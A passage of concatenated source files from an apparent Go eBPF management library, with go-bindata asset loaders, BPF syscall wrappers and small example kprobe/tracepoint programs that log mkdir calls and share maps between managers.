}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/syscalls.go<|end_filename|>
package manager
import (
"github.com/DataDog/ebpf"
"golang.org/x/sys/unix"
"syscall"
"unsafe"
"github.com/pkg/errors"
"github.com/DataDog/ebpf/internal"
)
func perfEventOpenTracepoint(id int, progFd int) (*internal.FD, error) {
attr := unix.PerfEventAttr{
Type: unix.PERF_TYPE_TRACEPOINT,
Sample_type: unix.PERF_SAMPLE_RAW,
Sample: 1,
Wakeup: 1,
Config: uint64(id),
}
attr.Size = uint32(unsafe.Sizeof(attr))
efd, err := unix.PerfEventOpen(&attr, -1, 0, -1, unix.PERF_FLAG_FD_CLOEXEC)
if efd < 0 {
return nil, errors.Wrap(err, "perf_event_open error")
}
if _, _, err := unix.Syscall(unix.SYS_IOCTL, uintptr(efd), unix.PERF_EVENT_IOC_ENABLE, 0); err != 0 {
return nil, errors.Wrap(err, "error enabling perf event")
}
if _, _, err := unix.Syscall(unix.SYS_IOCTL, uintptr(efd), unix.PERF_EVENT_IOC_SET_BPF, uintptr(progFd)); err != 0 {
return nil, errors.Wrap(err, "error attaching bpf program to perf event")
}
return internal.NewFD(uint32(efd)), nil
}
type bpfProgAttachAttr struct {
targetFD uint32
attachBpfFD uint32
attachType uint32
attachFlags uint32
}
const (
_ProgAttach = 8
_ProgDetach = 9
)
func bpfProgAttach(progFd int, targetFd int, attachType ebpf.AttachType) (int, error) {
attr := bpfProgAttachAttr{
targetFD: uint32(targetFd),
attachBpfFD: uint32(progFd),
attachType: uint32(attachType),
}
ptr, err := internal.BPF(_ProgAttach, unsafe.Pointer(&attr), unsafe.Sizeof(attr))
if err != nil {
return -1, errors.Wrapf(err, "can't attach program id %d to target fd %d", progFd, targetFd)
}
return int(ptr), nil
}
func bpfProgDetach(progFd int, targetFd int, attachType ebpf.AttachType) (int, error) {
attr := bpfProgAttachAttr{
targetFD: uint32(targetFd),
attachBpfFD: uint32(progFd),
attachType: uint32(attachType),
}
ptr, err := internal.BPF(_ProgDetach, unsafe.Pointer(&attr), unsafe.Sizeof(attr))
if err != nil {
return -1, errors.Wrapf(err, "can't detach program id %d to target fd %d", progFd, targetFd)
}
return int(ptr), nil
}
func sockAttach(sockFd int, progFd int) error {
return syscall.SetsockoptInt(sockFd, syscall.SOL_SOCKET, unix.SO_ATTACH_BPF, progFd)
}
func sockDetach(sockFd int, progFd int) error {
return syscall.SetsockoptInt(sockFd, syscall.SOL_SOCKET, unix.SO_DETACH_BPF, progFd)
}
<|start_filename|>manager/examples/programs/socket/utils.go<|end_filename|>
package main
import (
"bytes"
"io"
"syscall"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Send a message through the socket pair to trigger the probe
func trigger(sockPair SocketPair) error {
logrus.Println("Sending a message through the socket pair to trigger the probes ...")
_, err := syscall.Write(sockPair[1], nil)
if err != nil {
return err
}
_, err = syscall.Read(sockPair[0], nil)
return err
}
type SocketPair [2]int
func (p SocketPair) Close() error {
err1 := syscall.Close(p[0])
err2 := syscall.Close(p[1])
if err1 != nil {
return err1
}
return err2
}
// newSocketPair - Create a socket pair
func newSocketPair() (SocketPair, error) {
return syscall.Socketpair(syscall.AF_UNIX, syscall.SOCK_DGRAM, 0)
}
<|start_filename|>manager/examples/object_pinning/main.go<|end_filename|>
package main
import (
"flag"
"github.com/sirupsen/logrus"
"github.com/DataDog/ebpf/manager"
)
var m = &manager.Manager{
Probes: []*manager.Probe{
&manager.Probe{
Section: "kprobe/mkdirat",
PinPath: "/sys/fs/bpf/mkdirat",
SyscallFuncName: "mkdirat",
},
&manager.Probe{
Section: "kretprobe/mkdirat",
SyscallFuncName: "mkdirat",
},
&manager.Probe{
Section: "kprobe/mkdir",
PinPath: "/sys/fs/bpf/mkdir",
SyscallFuncName: "mkdir",
},
&manager.Probe{
Section: "kretprobe/mkdir",
SyscallFuncName: "mkdir",
},
},
Maps: []*manager.Map{
&manager.Map{
Name: "map1",
MapOptions: manager.MapOptions{
PinPath: "/sys/fs/bpf/map1",
},
},
},
}
func main() {
// Parse CLI arguments
var kill bool
flag.BoolVar(&kill, "kill", false, "kills the programs suddenly before doing any cleanup")
flag.Parse()
logrus.Println("if they exist, pinned object will be automatically loaded")
// Initialize the manager
if err := m.Init(recoverAssets()); err != nil {
logrus.Fatal(err)
}
// Start the manager
if err := m.Start(); err != nil {
logrus.Fatal(err)
}
logrus.Println("successfully started, head over to /sys/kernel/debug/tracing/trace_pipe")
// Create a folder to trigger the probes
if err := trigger(); err != nil {
logrus.Error(err)
}
if kill {
logrus.Println("=> Stopping the program without cleanup, the pinned map and programs should show up in /sys/fs/bpf/")
logrus.Println("=> Restart without --kill to load the pinned object from the bpf file system and properly remove them")
return
}
// Close the manager
if err := m.Stop(manager.CleanAll); err != nil {
logrus.Fatal(err)
}
}
<|start_filename|>manager/examples/programs/tracepoint/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
SEC("tracepoint/syscalls/sys_enter_mkdirat")
int tracepoint_sys_enter_mkdirat(void *ctx)
{
bpf_printk("mkdirat enter (tracepoint)\n");
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/programs/kprobe/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
SEC("kprobe/vfs_mkdir")
int kprobe_vfs_mkdir(void *ctx)
{
bpf_printk("mkdir (vfs hook point)\n");
return 0;
};
SEC("kprobe/utimes_common")
int kprobe_utimes_common(void *ctx)
{
bpf_printk("utimes_common\n");
return 0;
};
SEC("kretprobe/mkdirat")
int kretpobe_unlinkat(void *ctx)
{
bpf_printk("mkdirat return (syscall hook point)\n");
return 0;
}
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/map_rewrite_vs_map_router/ebpf/prog2.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
// shared_cache - This map will be shared with other Manager
struct bpf_map_def SEC("maps/shared_cache1") shared_cache1 = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
/**
* routed_cache is used to define the types of maps that are expected in maps_router
* WARNING: it has to be the first map defined in the `maps/maps_router`
* section since it is referred to as map #0 in maps_router.
*/
struct bpf_map_def SEC("maps/maps_router") routed_cache = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
struct bpf_map_def SEC("maps/maps_router") maps_router = {
.type = BPF_MAP_TYPE_HASH_OF_MAPS,
.key_size = sizeof(u32),
.max_entries = 10,
.inner_map_idx = 0, /* map_fd[0] is routed_cache */
};
SEC("kprobe/vfs_mkdir")
int kprobe_vfs_mkdir(void *ctx)
{
bpf_printk("(prog2) writing 42 in shared_cache1 at key 1 ...\n");
// Update the shared cache
u32 key = 1;
u32 val = 42;
bpf_map_update_elem(&shared_cache1, &key, &val, BPF_ANY);
// Update the routed map
val = 500;
void *routed_map = bpf_map_lookup_elem(&maps_router, &key);
if (routed_map == NULL)
{
return 0;
}
bpf_printk("(prog2) writing 500 in router_map at key 1 ...\n");
bpf_map_update_elem(routed_map, &key, &val, BPF_ANY);
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/map_rewrite_vs_map_router/demo.go<|end_filename|>
package main
import (
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"github.com/DataDog/ebpf"
"github.com/DataDog/ebpf/manager"
)
func demoMapEditor() error {
logrus.Println("MAP EDITOR DEMO")
// Select the shared map to give it to m2
sharedCache1, found, err := m1.GetMap("shared_cache1")
if err != nil || !found {
return errors.Wrap(err,"couldn't find shared_cache1 in m1")
}
if err = dumpSharedMap(sharedCache1); err != nil {
return err
}
// Give shared_cache1 to m2 through a map editor
options := manager.Options{MapEditors: map[string]*ebpf.Map{
"shared_cache1": sharedCache1,
}}
// Initialize m2, edit shared_cache1 and start it
if err = m2.InitWithOptions(recoverAsset("/prog2.o"), options); err != nil {
return err
}
if err = m2.Start(); err != nil {
return err
}
if err = trigger(); err != nil {
return err
}
return dumpSharedMap(sharedCache1)
}
func demoMapRouter() error {
logrus.Println("MAP ROUTER DEMO")
// Select the shared map to give it to m2
sharedCache2, found, err := m1.GetMap("shared_cache2")
if err != nil || !found {
return errors.Wrap(err, "couldn't find shared_cache2 in m1")
}
if err = dumpSharedMap(sharedCache2); err != nil {
return err
}
// Give shared_cache2 to m2 through a map router
router := manager.MapRoute{RoutingMapName: "maps_router", Key: uint32(1), Map: sharedCache2}
if err := m2.UpdateMapRoutes(router); err != nil {
return err
}
if err = trigger(); err != nil {
return err
}
return dumpSharedMap(sharedCache2)
}
<|start_filename|>kernel_version_unsupported.go<|end_filename|>
// +build !linux
package ebpf
import (
"fmt"
"runtime"
)
var ErrNonLinux = fmt.Errorf("unsupported platform %s/%s", runtime.GOOS, runtime.GOARCH)
func KernelVersionFromReleaseString(releaseString string) (uint32, error) {
return 0, ErrNonLinux
}
func CurrentKernelVersion() (uint32, error) {
return 0, ErrNonLinux
}
<|start_filename|>manager/examples/map_rewrite_vs_map_router/utils.go<|end_filename|>
package main
import (
"bytes"
"encoding/binary"
"github.com/DataDog/ebpf"
"io"
"os"
"unsafe"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
// ByteOrder - host byte order
var ByteOrder binary.ByteOrder
func init() {
ByteOrder = getHostByteOrder()
}
// getHostByteOrder - Returns the host byte order
func getHostByteOrder() binary.ByteOrder {
var i int32 = 0x01020304
u := unsafe.Pointer(&i)
pb := (*byte)(u)
b := *pb
if b == 0x04 {
return binary.LittleEndian
}
return binary.BigEndian
}
// recoverAsset - Recover ebpf asset
func recoverAsset(asset string) io.ReaderAt {
buf, err := Asset(asset)
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Creates and then removes a tmp folder to trigger the probes
func trigger() error {
logrus.Println("Generating events to trigger the probes ...")
// Creating a tmp directory to trigger the probes
tmpDir := "/tmp/test_folder"
logrus.Printf("creating %v", tmpDir)
err := os.MkdirAll(tmpDir, 0666)
if err != nil {
return err
}
// Removing the tmp directory
return os.RemoveAll(tmpDir)
}
// dumpSharedMap - Dumps the content of the provided map at the provided key
func dumpSharedMap(sharedMap *ebpf.Map) error {
var key, val uint32
entries := sharedMap.Iterate()
for entries.Next(&key, &val) {
// Order of keys is non-deterministic due to randomized map seed
logrus.Printf("%v contains %v at key %v", sharedMap, val, key)
}
return entries.Err()
}
<|start_filename|>manager/examples/map_rewrite_vs_map_router/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/prog1.o
// ebpf/bin/prog2.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProg1o = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x56\x4d\x68\xd4\x40\x14\x7e\xd9\xdd\x76\xeb\xb6\x68\x2b\x14\x6a\xe8" +
"\x21\xa0\x42\xbd\xa4\xdd\x15\x8b\x87\x0a\x65\xa1\xeb\xa5\x88\x94\x7a\x13\x62\x9a\x4d\xdd\xa5\xdd\x1f\x92\xb4\x58" +
"\x57\xb0\x17\xa1\x47\x41\xc4\x9b\xa2\x5e\xbc\x7a\xda\x5e\xc4\xab\xe0\xa5\x47\x8f\x3d\x0a\x5e\xfc\x39\xe8\xa1\x38" +
"\xf2\x26\x6f\x92\x74\x92\x18\x29\x28\x88\x3e\xc8\xce\xcc\x37\xef\xcd\xfb\xf6\xe5\x7b\xb3\x7b\x77\x61\xb1\x96\x53" +
"\x14\x10\xa6\xc0\x57\x08\x57\xa1\xed\x0c\x85\xf3\x79\xfa\x3c\x01\x0a\xf4\x15\xe0\xfe\x96\x7a\xc0\x10\x7d\xfd\xcc" +
"\xf7\x29\xe6\x00\x0e\x18\x63\x13\xd2\x61\xf7\xc0\xf7\xbf\x06\x63\x7c\x8d\xfb\x9a\xdd\xea\xe2\xdc\xdb\x2a\x41\x4f" +
"\x7d\xcf\x04\x6e\x5a\x0d\x1b\xe7\x65\xad\xe9\xf6\xd4\xfd\x00\x77\x1b\xa6\x83\x73\xbb\x6e\x58\x3d\xf5\x5d\x80\x4f" +
"\x75\x9d\x0e\xce\x6f\x96\xcf\x69\x3d\x75\xcf\xe7\xf3\x94\xf8\x28\x00\x7b\x8c\xb1\x7e\x0e\x40\x23\x1e\x83\x00\x30" +
"\x00\xe3\x7c\xbf\x4f\x3c\x5d\xf5\x33\x13\xeb\x8d\x12\xc0\x9a\xfa\x31\x38\xbf\xed\x99\x4d\x9c\xb7\x5d\xed\x6c\x32" +
"\x4f\xab\x73\x54\x9e\x66\xde\xcf\x9f\xc4\xf7\x74\x84\xef\xef\xa8\x6f\xe5\x2f\xa9\x6f\xe5\x0f\xd4\xb7\x4f\x75\x7c" +
"\x48\x23\xd2\x2e\xd0\x53\x8a\x75\xc5\xbf\x6d\xff\x6b\x93\x6d\xa8\x45\xd4\x21\x6a\x15\x75\x8a\x5a\xc6\xfb\x0c\x7b" +
"\x12\xfb\x31\x79\xdf\xea\x60\x2f\x60\x1f\x6c\x94\xb2\xcf\xab\x64\x9c\x57\x39\x7c\xde\xe5\xab\x8b\x00\xdf\x19\x63" +
"\x4f\x3e\x28\x30\x21\xf1\xe5\x6d\x1a\xdd\x28\x44\x1e\xfc\x0d\x18\xf5\xe1\x51\xe1\x7f\x7b\x09\x86\xee\x0c\x2b\x23" +
"\xd8\x7b\xf4\x08\xdb\xcf\x65\xd7\xe7\x3a\x3f\xfa\x13\x93\xf1\x97\xfc\x33\x0f\x6f\x24\xfc\x11\xe1\x5d\xe9\xde\xbb" +
"\x4f\xf8\x94\x94\x73\x8b\xf0\xbd\x04\x2e\x79\xc8\xc7\xb0\x05\x00\x18\x83\xf0\xc7\xae\x40\xe3\x1c\xc7\x8f\xc5\x70" +
"\xac\xc3\xc9\xc8\x39\xe2\x3b\xbf\xe2\xfe\x03\x01\x3e\x49\x7c\x9f\x73\x7c\x30\x86\x6b\xb4\x56\xa8\x97\xb6\x95\x70" +
"\x3d\x8c\x7e\x91\x7d\x1e\xad\x7b\xf6\x2d\x0f\xf4\xea\x72\x4d\xc7\xc9\x9a\x63\x7b\x5d\xa7\xb3\x62\x1b\x9b\xab\xae" +
"\xd1\x5a\xab\x37\x1d\xd0\x1d\x7b\x3d\xc0\xa7\x43\xdc\xd8\xb4\x1d\xb7\xd9\x69\x83\xb1\xde\xb4\xec\xb6\x6b\x73\x4f" +
"\xdd\x6e\x18\xab\x8e\xd9\xb2\x81\x4b\x48\xb7\x40\x77\x3d\xc7\x33\x57\x40\x77\xb7\x5a\x7c\xac\x2e\xd7\x60\xb1\x5a" +
"\x9d\x31\x66\x41\x77\x3a\x75\xd3\x33\xd1\xa5\xac\x97\x67\x7d\xf8\x82\x3f\x9c\x87\x96\xd9\x75\xa7\x0f\x49\xd0\xdf" +
"\xa9\xc4\x77\xca\xf1\xf7\x72\x14\xab\xf3\xf7\x19\xb7\xdd\xa2\x3f\xbe\x95\x70\xf9\x3f\x8e\x12\xad\x6d\xc4\xe6\x53" +
"\xf2\x15\xa4\xf5\x54\x46\xbc\xdc\x0b\x43\x92\xdf\x19\x80\x88\xba\x42\xdb\x21\xfe\x42\x1f\xc7\xe9\x7b\x8a\x78\xd1" +
"\x87\xbb\x94\x5f\xae\x81\x46\xc0\xa4\xf2\x73\xfe\x8f\x53\xe2\xe7\x0a\xbf\x16\xbf\x4d\xf1\x15\x09\xbf\x41\x2d\xf0" +
"\x40\xc2\x83\xfb\x83\xc6\x5a\x4a\xfe\x2f\x03\xc9\xf9\xe4\xf7\x77\x29\x25\xfe\x5b\x4a\xbc\xbc\xf6\x12\xce\x44\x3b" +
"\xa0\xf8\x53\x19\xf9\x8b\x29\xf1\xe3\x24\x08\x2d\x23\x7e\x89\x30\xf9\x9a\xba\x48\xf1\x33\x12\x2e\xeb\xe7\x4a\x8a" +
"\x7e\x5e\x90\x7e\x44\xbd\x51\x3f\x23\x09\xfa\x59\x4f\xc8\x8d\xd6\x10\xfc\x23\xf7\x51\x31\x12\x2f\xee\xfb\x1f\x01" +
"\x00\x00\xff\xff\x1e\xb1\xa1\x42\x48\x0c\x00\x00")
func bindataProg1oBytes() ([]byte, error) {
return bindataRead(
_bindataProg1o,
"/prog1.o",
)
}
func bindataProg1o() (*asset, error) {
bytes, err := bindataProg1oBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/prog1.o",
size: 3144,
md5checksum: "",
mode: os.FileMode(436),
modTime: time.Unix(1594297957, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
var _bindataProg2o = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x56\x3f\x68\x14\x4f\x14\xfe\xf6\xee\x7e\x77\xf7\x8b\xf1\x2f\x08\xc9" +
"\x91\x62\x2c\x04\xb5\x98\xdc\x1d\x1a\x02\x36\xe1\xc0\xc4\x22\x45\x94\x14\x5a\xc8\xb2\xb9\x6c\x92\xe3\x72\x7f\xdc" +
"\x5b\xa3\xc9\x05\xb4\x30\x8d\xd8\x58\x08\x16\x82\xa8\x20\x69\xac\x13\x30\x70\x29\x53\x5a\xa6\x4c\x19\xb0\x89\x20" +
"\xd8\xb9\xf2\x66\x67\x6e\xd7\xc9\xee\x1d\xd6\xe6\xc1\x66\xde\x7c\x3b\xdf\xbc\xd9\x6f\xdf\x7d\x9b\xa7\xb7\xa6\x27" +
"\x13\x86\x01\x15\x06\x7e\x22\x98\x05\xb1\x99\x0d\xf2\x09\xf9\xf7\x2c\x0c\x6c\x19\xc0\x00\x80\x6a\xee\xc8\x23\x74" +
"\xc8\x00\xec\x55\x56\xa0\x9c\x71\xce\xdb\xb9\xc3\x2e\xbe\x64\x17\x18\xe5\x96\xcb\xaa\xed\xdc\x41\x17\xb7\x1c\x7b" +
"\x9e\x72\xb3\x6c\x95\xdb\xb9\xfd\x2e\x7e\xbd\xc8\x2a\x94\xd7\x59\x6b\xa9\x9d\xfb\xea\xe3\x19\xe0\xb1\x53\x71\x29" +
"\xaf\xd4\x17\x59\x7b\x6d\xcf\xc7\xb3\xc0\x95\xa6\xd3\xa0\x7c\xb1\x78\x95\xb5\x5f\xec\x0a\xbc\xf3\xde\x3f\x73\xc6" +
"\x00\x76\x3d\xcf\xdb\x4a\x00\x45\x00\x1b\x00\xd2\x80\x38\x3f\x3d\x6f\x39\xb7\x23\xd6\xd3\xfc\x9a\x98\x6f\xfb\xfc" +
"\x4f\x92\x9f\x06\x76\x3c\xcf\xeb\x7c\x94\xf3\x24\xb0\xed\x79\xde\x90\x26\x56\x67\xce\x1f\xb7\x52\xfe\x48\x75\x12" +
"\x72\xdf\x1f\x46\xb0\x6f\x1c\x6f\x03\xfe\x79\x3a\x69\x7f\x7e\x31\x3d\x0c\xb5\x9e\x15\x18\xa7\x9c\xf3\x01\x84\x75" +
"\x6d\x32\x4b\xe8\xc1\xaa\xf6\x6a\x58\xd7\xc6\x23\xd7\xa6\xdc\x31\x6b\x56\x58\xd7\x1b\xf9\x3c\xf3\xf5\x63\x8e\xd2" +
"\x55\xe9\xd8\x4b\xb7\x7c\x48\xb7\xce\x07\x79\x3f\x11\xad\x4b\xc7\x8a\xd1\x41\x3e\xef\xeb\x6e\xbf\x01\x29\x79\x0d" +
"\x44\xf4\xdd\xbf\x1c\x27\xda\xc4\xc7\x69\xa9\x0b\x4e\xb4\xe9\x19\xe4\x89\xe4\x87\xe4\x99\xe4\x97\xe4\xa9\xe4\xa7" +
"\xe4\xb9\xe4\xb7\xe4\xc9\xe4\xc7\xe4\xd9\xe4\xd7\xba\x96\x3a\x9f\xbc\x83\x7c\x83\xbc\x85\x7c\xa5\xa9\xb1\xa7\x66" +
"\xa6\xf1\xcb\xf3\xbc\x77\xdf\x0c\x0c\x69\x7b\x09\xcb\x0b\xdf\x48\x85\x2e\xfa\xbe\x9c\x0b\xd6\xaa\xd4\x58\xbb\x8b" +
"\xec\xfa\x29\x63\x90\xbc\x4b\x5e\x2a\x26\x12\xfd\x9f\xdf\x15\xdb\x7f\xf7\x74\xdc\xb7\xb7\x24\xf2\x11\x7b\x24\x91" +
"\x3c\x86\xcd\x00\x38\x8f\xe0\x23\xa8\x7a\x6f\x4a\xe0\xff\x1f\xc3\xe9\xfc\x17\x42\xfb\xa8\xb3\xde\x14\xeb\xd3\x18" +
"\x91\xfe\xaf\xc6\x45\x89\xab\x50\xf8\x67\x81\xff\x77\x0c\x57\x1f\x69\x1a\xa8\xfa\x78\x68\x9e\xa1\x75\xa1\x65\xe2" +
"\x14\xdc\xb5\x9f\xb8\xe0\xa5\xd9\x49\x4e\x49\xb5\xe9\x34\xe6\x6c\x73\x65\xa1\x65\xd6\xaa\xf3\x15\x07\xdc\xb1\x97" +
"\x7d\x70\x34\x00\x6b\x56\xb3\x35\x4a\x7f\x4c\xff\x85\xc3\x5c\xb1\x9d\x56\xa5\x51\x87\xb9\x5c\x29\xdb\xf5\x96\x2d" +
"\x78\xdc\x5e\x32\x17\x1c\xab\x66\x43\x2c\x93\x8d\x05\xd1\x3a\xbc\x0c\xde\x72\x1d\xd7\x9a\x03\x6f\xad\xd6\xc4\x58" +
"\x9a\x9d\x04\x77\x1a\xf3\x96\x6b\xd1\xbd\x02\x2f\x8c\x61\xba\x54\xca\x9b\x45\xbf\xe2\x1f\xed\x19\xfd\x5e\xff\x36" +
"\xd6\x95\x0e\x5a\x1c\x66\xfc\xf1\x8b\x86\xeb\xff\x03\x19\xf2\x4a\x6b\xf8\x44\x4c\xbd\x94\x36\xbf\xdc\x87\xaf\xf7" +
"\x72\x56\x5b\x77\x49\xbe\x67\x3d\xb6\xe5\xf9\x99\x9c\x9f\x91\xcf\xa9\xf8\xea\x77\xb4\x19\xee\x85\x50\x3c\x93\x75" +
"\x47\x8c\xde\xe7\x1f\x8b\xe1\xbf\x95\xc0\x78\xa2\x37\xff\x95\xe4\x17\x35\xfc\x40\xb6\x76\x53\xc3\xbb\xbf\x7f\x39" +
"\xde\x89\xa9\x3f\x93\x8e\xae\xa7\xbf\xbf\xdb\x31\xfc\xd9\x18\xbe\x3e\x7f\x19\xb1\x27\xc5\x3d\xc9\x1f\xee\x53\x3f" +
"\x13\xc3\x7f\x28\xf9\xac\x0f\xff\x81\xc4\x74\xbb\x7a\x23\xf9\x79\x0d\xd7\xfb\xe7\x7e\x4c\xff\xec\xcb\xfe\x51\x7a" +
"\x53\xff\x0c\x46\xf4\xcf\xf3\x88\xda\x14\x7b\xb2\xfe\x51\xe8\xdc\xa9\x10\x5f\xf9\xf5\xef\x00\x00\x00\xff\xff\x22" +
"\xe6\xc7\x14\x68\x0c\x00\x00")
func bindataProg2oBytes() ([]byte, error) {
return bindataRead(
_bindataProg2o,
"/prog2.o",
)
}
func bindataProg2o() (*asset, error) {
bytes, err := bindataProg2oBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/prog2.o",
size: 3176,
md5checksum: "",
mode: os.FileMode(436),
modTime: time.Unix(1594297957, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/prog1.o": bindataProg1o,
"/prog2.o": bindataProg2o,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
